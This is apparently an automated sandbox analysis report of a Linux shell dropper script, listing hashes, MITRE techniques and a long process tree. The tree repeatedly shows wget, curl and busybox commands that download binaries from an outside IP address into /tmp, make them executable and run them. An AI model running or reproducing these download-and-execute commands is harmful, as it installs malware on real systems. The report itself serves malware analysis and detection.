2013171213d27c2f95f106cb7eca2000298cbb0f2d372071d99af8b12ed68e29

General

Target

2013171213d27c2f95f106cb7eca2000298cbb0f2d372071d99af8b12ed68e29.sh
Size

10KB
MD5

abfaa07509a98cf9d61a9ee03366064b
SHA1

29b8aa70ebe761df31582b1b62505f786b247305
SHA256

2013171213d27c2f95f106cb7eca2000298cbb0f2d372071d99af8b12ed68e29
SHA512

f075902543aeb6d5a01e97c8cde8c65e59b945c859a7b846c14d98263366506322b3b33a50f3dba6f4ab67698396cf4e90cf9ab26835c00dce9124844ed97329
SSDEEP

192:qJBElpvTXslVFDTABtsvA9tovAEdXjJJBElp9TXslVjVDTABtKy:8DTABtsvAHovAEdXjBDTABtKy

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 28 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

Processes:

chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmod

pid	process
1526	chmod
1616	chmod
1634	chmod
1550	chmod
1562	chmod
1640	chmod
1646	chmod
1520	chmod
1628	chmod
1544	chmod
1574	chmod
1598	chmod
1604	chmod
1610	chmod
1622	chmod
1538	chmod
1592	chmod
1664	chmod
1568	chmod
1586	chmod
1652	chmod
1658	chmod
1508	chmod
1532	chmod
1556	chmod
1580	chmod
1514	chmod
1670	chmod

Executes dropped EXE 28 IoCs

Processes:

ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqwh2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39pxEVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj11nCDdhzlnSnXajJ21CutBer3j9YONbDPcPq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmchK1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBTweqJNBf8c2g1fJM1o23r3J0gI8VptLGhPaE2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDEk7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGotDzQkhNshKptEsPA3ltf516QgABeKEiBY8RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1uSC3qKbILRW2hWzlMHFetryS3VaErrO79PDZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJtDzQkhNshKptEsPA3ltf516QgABeKEiBY8RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1uSC3qKbILRW2hWzlMHFetryS3VaErrO79PDZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJONYgz1i23gINWr7sttSVyPQ1K9qtovRiqwh2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW111nCDdhzlnSnXajJ21CutBer3j9YONbDPcPq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmchK1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBTweqJNBf8c2g1fJM1o23r3J0gI8VptLGhPaE2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDEk7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGoFMLH2xw3uQIVGQz3rTgpSiVEtHMceP39pxEVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj

System Network Configuration Discovery 1 TTPs 10 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

Processes:

K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBTrmK1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBTrmcurlbusyboxcurlbusyboxwgetwget

pid	process
1545	K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT
1546	rm
1641	K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT
1642	rm
1542	curl
1543	busybox
1638	curl
1639	busybox
1541	wget
1637	wget

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

Processes:

curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurl

description	ioc	process
File opened for modification	/tmp/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw	curl
File opened for modification	/tmp/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px	curl
File opened for modification	/tmp/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT	curl
File opened for modification	/tmp/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa	curl
File opened for modification	/tmp/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo	curl
File opened for modification	/tmp/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD	curl
File opened for modification	/tmp/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ	curl
File opened for modification	/tmp/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw	curl
File opened for modification	/tmp/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch	curl
File opened for modification	/tmp/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj	curl
File opened for modification	/tmp/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj	curl
File opened for modification	/tmp/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT	curl
File opened for modification	/tmp/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo	curl
File opened for modification	/tmp/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc	curl
File opened for modification	/tmp/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u	curl
File opened for modification	/tmp/tDzQkhNshKptEsPA3ltf516QgABeKEiBY8	curl
File opened for modification	/tmp/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1	curl
File opened for modification	/tmp/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch	curl
File opened for modification	/tmp/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE	curl
File opened for modification	/tmp/tDzQkhNshKptEsPA3ltf516QgABeKEiBY8	curl
File opened for modification	/tmp/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa	curl
File opened for modification	/tmp/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px	curl
File opened for modification	/tmp/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc	curl
File opened for modification	/tmp/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD	curl
File opened for modification	/tmp/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1	curl
File opened for modification	/tmp/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ	curl
File opened for modification	/tmp/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u	curl
File opened for modification	/tmp/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE	curl

/tmp/2013171213d27c2f95f106cb7eca2000298cbb0f2d372071d99af8b12ed68e29.sh
/tmp/2013171213d27c2f95f106cb7eca2000298cbb0f2d372071d99af8b12ed68e29.sh
1⤵
PID:1500

/bin/rm
/bin/rm bins.sh
2⤵
PID:1501

/usr/bin/wget
wget http://87.120.84.230/bins/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw
2⤵
PID:1502

/usr/bin/curl
curl -O http://87.120.84.230/bins/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw
2⤵
- Writes file to tmp directory
PID:1506

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw
2⤵
PID:1507

/bin/chmod
chmod 777 ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw
2⤵
- File and Directory Permissions Modification
PID:1508

/tmp/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw
./ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw
2⤵
- Executes dropped EXE
PID:1509

/bin/rm
rm ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw
2⤵
PID:1510

/usr/bin/wget
wget http://87.120.84.230/bins/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1
2⤵
PID:1511

/usr/bin/curl
curl -O http://87.120.84.230/bins/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1
2⤵
- Writes file to tmp directory
PID:1512

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1
2⤵
PID:1513

/bin/chmod
chmod 777 h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1
2⤵
- File and Directory Permissions Modification
PID:1514

/tmp/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1
./h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1
2⤵
- Executes dropped EXE
PID:1515

/bin/rm
rm h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1
2⤵
PID:1516

/usr/bin/wget
wget http://87.120.84.230/bins/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px
2⤵
PID:1517

/usr/bin/curl
curl -O http://87.120.84.230/bins/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px
2⤵
- Writes file to tmp directory
PID:1518

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px
2⤵
PID:1519

/bin/chmod
chmod 777 FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px
2⤵
- File and Directory Permissions Modification
PID:1520

/tmp/FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px
./FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px
2⤵
- Executes dropped EXE
PID:1521

/bin/rm
rm FMLH2xw3uQIVGQz3rTgpSiVEtHMceP39px
2⤵
PID:1522

/usr/bin/wget
wget http://87.120.84.230/bins/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj
2⤵
PID:1523

/usr/bin/curl
curl -O http://87.120.84.230/bins/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj
2⤵
- Writes file to tmp directory
PID:1524

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj
2⤵
PID:1525

/bin/chmod
chmod 777 EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj
2⤵
- File and Directory Permissions Modification
PID:1526

/tmp/EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj
./EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj
2⤵
- Executes dropped EXE
PID:1527

/bin/rm
rm EVecimTLurdRiqRiBbLWuIaqc5SpkzPlaj
2⤵
PID:1528

/usr/bin/wget
wget http://87.120.84.230/bins/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc
2⤵
PID:1529

/usr/bin/curl
curl -O http://87.120.84.230/bins/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc
2⤵
- Writes file to tmp directory
PID:1530

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc
2⤵
PID:1531

/bin/chmod
chmod 777 11nCDdhzlnSnXajJ21CutBer3j9YONbDPc
2⤵
- File and Directory Permissions Modification
PID:1532

/tmp/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc
./11nCDdhzlnSnXajJ21CutBer3j9YONbDPc
2⤵
- Executes dropped EXE
PID:1533

/bin/rm
rm 11nCDdhzlnSnXajJ21CutBer3j9YONbDPc
2⤵
PID:1534

/usr/bin/wget
wget http://87.120.84.230/bins/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch
2⤵
PID:1535

/usr/bin/curl
curl -O http://87.120.84.230/bins/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch
2⤵
- Writes file to tmp directory
PID:1536

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch
2⤵
PID:1537

/bin/chmod
chmod 777 Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch
2⤵
- File and Directory Permissions Modification
PID:1538

/tmp/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch
./Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch
2⤵
- Executes dropped EXE
PID:1539

/bin/rm
rm Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch
2⤵
PID:1540

/usr/bin/wget
wget http://87.120.84.230/bins/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT
2⤵
- System Network Configuration Discovery
PID:1541

/usr/bin/curl
curl -O http://87.120.84.230/bins/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT
2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1542

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT
2⤵
- System Network Configuration Discovery
PID:1543

/bin/chmod
chmod 777 K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT
2⤵
- File and Directory Permissions Modification
PID:1544

/tmp/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT
./K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT
2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1545

/bin/rm
rm K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT
2⤵
- System Network Configuration Discovery
PID:1546

/usr/bin/wget
wget http://87.120.84.230/bins/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa
2⤵
PID:1547

/usr/bin/curl
curl -O http://87.120.84.230/bins/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa
2⤵
- Writes file to tmp directory
PID:1548

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa
2⤵
PID:1549

/bin/chmod
chmod 777 weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa
2⤵
- File and Directory Permissions Modification
PID:1550

/tmp/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa
./weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa
2⤵
- Executes dropped EXE
PID:1551

/bin/rm
rm weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa
2⤵
PID:1552

/usr/bin/wget
wget http://87.120.84.230/bins/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE
2⤵
PID:1553

/usr/bin/curl
curl -O http://87.120.84.230/bins/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE
2⤵
- Writes file to tmp directory
PID:1554

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE
2⤵
PID:1555

/bin/chmod
chmod 777 E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE
2⤵
- File and Directory Permissions Modification
PID:1556

/tmp/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE
./E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE
2⤵
- Executes dropped EXE
PID:1557

/bin/rm
rm E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE
2⤵
PID:1558

/usr/bin/wget
wget http://87.120.84.230/bins/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo
2⤵
PID:1559

/usr/bin/curl
curl -O http://87.120.84.230/bins/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo
2⤵
- Writes file to tmp directory
PID:1560

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo
2⤵
PID:1561

/bin/chmod
chmod 777 k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo
2⤵
- File and Directory Permissions Modification
PID:1562

/tmp/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo
./k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo
2⤵
- Executes dropped EXE
PID:1563

/bin/rm
rm k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo
2⤵
PID:1564

/usr/bin/wget
wget http://87.120.84.230/bins/tDzQkhNshKptEsPA3ltf516QgABeKEiBY8
2⤵
PID:1565

/usr/bin/curl
curl -O http://87.120.84.230/bins/tDzQkhNshKptEsPA3ltf516QgABeKEiBY8
2⤵
- Writes file to tmp directory
PID:1566

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/tDzQkhNshKptEsPA3ltf516QgABeKEiBY8
2⤵
PID:1567

/bin/chmod
chmod 777 tDzQkhNshKptEsPA3ltf516QgABeKEiBY8
2⤵
- File and Directory Permissions Modification
PID:1568

/tmp/tDzQkhNshKptEsPA3ltf516QgABeKEiBY8
./tDzQkhNshKptEsPA3ltf516QgABeKEiBY8
2⤵
- Executes dropped EXE
PID:1569

/bin/rm
rm tDzQkhNshKptEsPA3ltf516QgABeKEiBY8
2⤵
PID:1570

/usr/bin/wget
wget http://87.120.84.230/bins/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u
2⤵
PID:1571

/usr/bin/curl
curl -O http://87.120.84.230/bins/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u
2⤵
- Writes file to tmp directory
PID:1572

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u
2⤵
PID:1573

/bin/chmod
chmod 777 RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u
2⤵
- File and Directory Permissions Modification
PID:1574

/tmp/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u
./RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u
2⤵
- Executes dropped EXE
PID:1575

/bin/rm
rm RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u
2⤵
PID:1576

/usr/bin/wget
wget http://87.120.84.230/bins/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD
2⤵
PID:1577

/usr/bin/curl
curl -O http://87.120.84.230/bins/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD
2⤵
- Writes file to tmp directory
PID:1578

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD
2⤵
PID:1579

/bin/chmod
chmod 777 SC3qKbILRW2hWzlMHFetryS3VaErrO79PD
2⤵
- File and Directory Permissions Modification
PID:1580

/tmp/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD
./SC3qKbILRW2hWzlMHFetryS3VaErrO79PD
2⤵
- Executes dropped EXE
PID:1581

/bin/rm
rm SC3qKbILRW2hWzlMHFetryS3VaErrO79PD
2⤵
PID:1582

/usr/bin/wget
wget http://87.120.84.230/bins/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ
2⤵
PID:1583

/usr/bin/curl
curl -O http://87.120.84.230/bins/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ
2⤵
- Writes file to tmp directory
PID:1584

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ
2⤵
PID:1585

/bin/chmod
chmod 777 ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ
2⤵
- File and Directory Permissions Modification
PID:1586

/tmp/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ
./ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ
2⤵
- Executes dropped EXE
PID:1587

/bin/rm
rm ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ
2⤵
PID:1588

/usr/bin/wget
wget http://87.120.84.230/bins/tDzQkhNshKptEsPA3ltf516QgABeKEiBY8
2⤵
PID:1589

/usr/bin/curl
curl -O http://87.120.84.230/bins/tDzQkhNshKptEsPA3ltf516QgABeKEiBY8
2⤵
- Writes file to tmp directory
PID:1590

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/tDzQkhNshKptEsPA3ltf516QgABeKEiBY8
2⤵
PID:1591

/bin/chmod
chmod 777 tDzQkhNshKptEsPA3ltf516QgABeKEiBY8
2⤵
- File and Directory Permissions Modification
PID:1592

/tmp/tDzQkhNshKptEsPA3ltf516QgABeKEiBY8
./tDzQkhNshKptEsPA3ltf516QgABeKEiBY8
2⤵
- Executes dropped EXE
PID:1593

/bin/rm
rm tDzQkhNshKptEsPA3ltf516QgABeKEiBY8
2⤵
PID:1594

/usr/bin/wget
wget http://87.120.84.230/bins/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u
2⤵
PID:1595

/usr/bin/curl
curl -O http://87.120.84.230/bins/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u
2⤵
- Writes file to tmp directory
PID:1596

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u
2⤵
PID:1597

/bin/chmod
chmod 777 RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u
2⤵
- File and Directory Permissions Modification
PID:1598

/tmp/RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u
./RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u
2⤵
- Executes dropped EXE
PID:1599

/bin/rm
rm RSVsiwYCxHrOchELoMRMmcL66dqwVZwJ1u
2⤵
PID:1600

/usr/bin/wget
wget http://87.120.84.230/bins/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD
2⤵
PID:1601

/usr/bin/curl
curl -O http://87.120.84.230/bins/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD
2⤵
- Writes file to tmp directory
PID:1602

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD
2⤵
PID:1603

/bin/chmod
chmod 777 SC3qKbILRW2hWzlMHFetryS3VaErrO79PD
2⤵
- File and Directory Permissions Modification
PID:1604

/tmp/SC3qKbILRW2hWzlMHFetryS3VaErrO79PD
./SC3qKbILRW2hWzlMHFetryS3VaErrO79PD
2⤵
- Executes dropped EXE
PID:1605

/bin/rm
rm SC3qKbILRW2hWzlMHFetryS3VaErrO79PD
2⤵
PID:1606

/usr/bin/wget
wget http://87.120.84.230/bins/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ
2⤵
PID:1607

/usr/bin/curl
curl -O http://87.120.84.230/bins/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ
2⤵
- Writes file to tmp directory
PID:1608

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ
2⤵
PID:1609

/bin/chmod
chmod 777 ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ
2⤵
- File and Directory Permissions Modification
PID:1610

/tmp/ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ
./ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ
2⤵
- Executes dropped EXE
PID:1611

/bin/rm
rm ZrgMO6pEjI2wM65n3dYqHt0qL8qLPQM9nJ
2⤵
PID:1612

/usr/bin/wget
wget http://87.120.84.230/bins/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw
2⤵
PID:1613

/usr/bin/curl
curl -O http://87.120.84.230/bins/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw
2⤵
- Writes file to tmp directory
PID:1614

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw
2⤵
PID:1615

/bin/chmod
chmod 777 ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw
2⤵
- File and Directory Permissions Modification
PID:1616

/tmp/ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw
./ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw
2⤵
- Executes dropped EXE
PID:1617

/bin/rm
rm ONYgz1i23gINWr7sttSVyPQ1K9qtovRiqw
2⤵
PID:1618

/usr/bin/wget
wget http://87.120.84.230/bins/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1
2⤵
PID:1619

/usr/bin/curl
curl -O http://87.120.84.230/bins/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1
2⤵
- Writes file to tmp directory
PID:1620

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1
2⤵
PID:1621

/bin/chmod
chmod 777 h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1
2⤵
- File and Directory Permissions Modification
PID:1622

/tmp/h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1
./h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1
2⤵
- Executes dropped EXE
PID:1623

/bin/rm
rm h2rD9sjBA11MtrslXJm4cUm8tqmhQMoZW1
2⤵
PID:1624

/usr/bin/wget
wget http://87.120.84.230/bins/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc
2⤵
PID:1625

/usr/bin/curl
curl -O http://87.120.84.230/bins/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc
2⤵
- Writes file to tmp directory
PID:1626

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc
2⤵
PID:1627

/bin/chmod
chmod 777 11nCDdhzlnSnXajJ21CutBer3j9YONbDPc
2⤵
- File and Directory Permissions Modification
PID:1628

/tmp/11nCDdhzlnSnXajJ21CutBer3j9YONbDPc
./11nCDdhzlnSnXajJ21CutBer3j9YONbDPc
2⤵
- Executes dropped EXE
PID:1629

/bin/rm
rm 11nCDdhzlnSnXajJ21CutBer3j9YONbDPc
2⤵
PID:1630

/usr/bin/wget
wget http://87.120.84.230/bins/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch
2⤵
PID:1631

/usr/bin/curl
curl -O http://87.120.84.230/bins/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch
2⤵
- Writes file to tmp directory
PID:1632

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch
2⤵
PID:1633

/bin/chmod
chmod 777 Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch
2⤵
- File and Directory Permissions Modification
PID:1634

/tmp/Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch
./Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch
2⤵
- Executes dropped EXE
PID:1635

/bin/rm
rm Pq33Nn7gUahnnh7naJ2u1QHOUaTg4RHmch
2⤵
PID:1636

/usr/bin/wget
wget http://87.120.84.230/bins/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT
2⤵
- System Network Configuration Discovery
PID:1637

/usr/bin/curl
curl -O http://87.120.84.230/bins/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT
2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1638

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT
2⤵
- System Network Configuration Discovery
PID:1639

/bin/chmod
chmod 777 K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT
2⤵
- File and Directory Permissions Modification
PID:1640

/tmp/K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT
./K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT
2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1641

/bin/rm
rm K1PQvMJAcipxCKdeQFyRWbS6bmP6hlNiBT
2⤵
- System Network Configuration Discovery
PID:1642

/usr/bin/wget
wget http://87.120.84.230/bins/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa
2⤵
PID:1643

/usr/bin/curl
curl -O http://87.120.84.230/bins/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa
2⤵
- Writes file to tmp directory
PID:1644

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa
2⤵
PID:1645

/bin/chmod
chmod 777 weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa
2⤵
- File and Directory Permissions Modification
PID:1646

/tmp/weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa
./weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa
2⤵
- Executes dropped EXE
PID:1647

/bin/rm
rm weqJNBf8c2g1fJM1o23r3J0gI8VptLGhPa
2⤵
PID:1648

/usr/bin/wget
wget http://87.120.84.230/bins/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE
2⤵
PID:1649

/usr/bin/curl
curl -O http://87.120.84.230/bins/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE
2⤵
- Writes file to tmp directory
PID:1650

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE
2⤵
PID:1651

/bin/chmod
chmod 777 E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE
2⤵
- File and Directory Permissions Modification
PID:1652

/tmp/E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE
./E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE
2⤵
- Executes dropped EXE
PID:1653

/bin/rm
rm E2ujNk6VxSkC4Y1HTWeTUzD3cyq9PpamDE
2⤵
PID:1654

/usr/bin/wget
wget http://87.120.84.230/bins/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo
2⤵
PID:1655

/usr/bin/curl
curl -O http://87.120.84.230/bins/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo
2⤵
- Writes file to tmp directory
PID:1656

/bin/busybox
/bin/busybox wget http://87.120.84.230/bins/k7iBvVYk0WaTgg2uE88KA2XVfKJfYmIWGo
2⤵
PID:1657

/bin/chmod
